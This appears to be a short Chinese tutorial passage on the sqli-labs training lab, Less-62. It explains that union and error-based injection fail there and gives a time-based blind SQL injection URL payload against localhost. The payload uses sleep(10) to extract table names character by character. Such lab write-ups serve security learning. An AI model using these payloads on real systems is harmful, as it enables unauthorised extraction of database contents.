此处union和报错注入都已经失效了,那我们就要使用延时注入了,此处给出一个示例

payload:

http://127.0.0.1/sqli-labs/Less-62/?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+

当正确的时候时间很短,当错误的时候时间大于10秒,此时可以利用脚本进行尝试。脚本攻击我们放在第三部分,此处就不贴代码了。

相关文章:

  • 2021-09-14
  • 2021-10-28
  • 2021-09-24
  • 2021-06-02
  • 2021-09-22
  • 2022-01-20
  • 2021-09-12
  • 2021-09-27
猜你喜欢
  • 2021-11-19
  • 2021-07-17
  • 2021-08-31
  • 2021-10-26
  • 2021-10-31
  • 2021-04-23
  • 2021-12-16
相关资源
相似解决方案